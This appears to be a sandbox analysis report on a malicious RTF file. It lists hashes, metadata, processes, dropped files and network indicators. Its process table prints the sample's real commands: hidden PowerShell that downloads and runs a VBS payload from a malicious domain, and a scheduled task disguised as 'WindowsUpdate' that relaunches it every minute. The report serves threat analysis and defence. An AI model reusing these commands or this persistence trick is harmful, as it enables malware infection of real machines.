Field | Value |
---|---|
File name | 2.doc |
Full analysis | https://app.any.run/tasks/a1fe0c1d-2c88-481f-82e6-35328ba66b9e |
Verdict | Malicious activity |
Analysis date | October 09, 2019, 14:09:27 |
OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags | |
Indicators | |
MIME | text/rtf |
File info | Rich Text Format data, version 1, unknown character set |
MD5 | F379111ED445ADE7157ADE15976E76B8 |
SHA1 | 8332CAAAD5B4CFB9A3E576AA0D494A40DE24860C |
SHA256 | F7DE2CDBBCDA0F35E2CDFF43DA93301E33F1A655A4EFC9A3B6E560BBA8701340 |
SSDEEP | 24576:s5Zvp5Zvi5ZvM5Zv05ZvE5Zvl5Zvd5Zvi5ZvE5Zvn:q |

Extension | Type |
---|---|
.rtf | Rich Text Format (100) |

Property | Value |
---|---|
InternalVersionNumber | 86 |
CharactersWithSpaces | 392 |
Characters | 335 |
Words | 58 |
Pages | 1 |
TotalEditTime | - |
RevisionNumber | 2 |
ModifyDate | 2018:03:12 22:02:00 |
CreateDate | 2018:03:12 22:02:00 |
LastModifiedBy | Windows User |
Author | Windows User |

PID | CMD | Path | Indicators | Parent process | Details |
---|---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\2.doc.rtf" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 |
3504 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" -Embedding | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | svchost.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Excel; Version: 14.0.6024.1000 |
2020 | cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','%Public%\\svchost325.vbs');Start-Process '%Public%\\svchost325.vbs' | C:\Windows\system32\cmd.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 1; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) |
968 | SchTasks /Create /sc MINUTE /MO 1 /TN WindowsUpdate /TR "Powershell -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\\\"http://0-day.us/img/2.vbs\\\",\\\"$env:public\svchost32.vbs\\\");(New-Object -com Shell.Application).ShellExecute(\\\"$env:public\svchost32.vbs\\\");" /F | C:\Windows\system32\SchTasks.exe | — | EXCEL.EXE | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Manages scheduled tasks; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
3484 | powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://0-day.us/img/2.vbs','C:\Users\Public\\svchost325.vbs');Start-Process 'C:\Users\Public\\svchost325.vbs' | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | | cmd.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
1644 | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile(\"http://0-day.us/img/2.vbs\",\"$env:public\svchost32.vbs\");(New-Object -com Shell.Application).ShellExecute(\"$env:public\svchost32.vbs\"); | C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.EXE | | taskeng.exe | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Version: 6.1.7600.16385 (win7_rtm.090713-1255) |

PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6695.tmp.cvr | — | — | — |
3504 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR6F01.tmp.cvr | — | — | — |
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MXD2E1NLH1WYF0FNWBNN.temp | — | — | — |
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\88CNW4S89X82EAB9BBME.temp | — | — | — |
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A272B20D1454EFE23A324E582F0E701D | 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 |
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | A272B20D1454EFE23A324E582F0E701D | 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 |
3484 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF187589.TMP | binary | A272B20D1454EFE23A324E582F0E701D | 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 |
1644 | Powershell.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF189c99.TMP | binary | A272B20D1454EFE23A324E582F0E701D | 68AA16559F2894A02236A7716541C3FCF362333253818FDFE6FDE31C94E95051 |
2824 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 39FB5468FDA3B01BD0E9143BDDE1AD47 | 393278A7DB63645C7F839369F8814CEAEDDF2A87EF1F1DF0F612F76CA6BCDF91 |
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BDE3EE41.emf | emf | 6AE8648267F97208E8A7FD6FF41023B4 | BE0087ECD00186B38B8DFA380E51AF7568185B3553835C8FD405793AB69657B1 |

PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1644 | Powershell.EXE | GET | 302 | 103.224.212.222:80 | http://0-day.us/img/2.vbs | AU | — | — | malicious |
1644 | Powershell.EXE | GET | 403 | 185.53.179.29:80 | http://ww38.0-day.us/img/2.vbs | DE | html | 162 b | malicious |

PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1644 | Powershell.EXE | 185.53.179.29:80 | ww38.0-day.us | Team Internet AG | DE | malicious |
3484 | powershell.exe | 103.224.212.222:80 | 0-day.us | Trellian Pty. Limited | AU | malicious |
1644 | Powershell.EXE | 103.224.212.222:80 | 0-day.us | Trellian Pty. Limited | AU | malicious |

Domain | IP | Reputation |
---|---|---|
0-day.us | | malicious |
ww38.0-day.us | | malicious |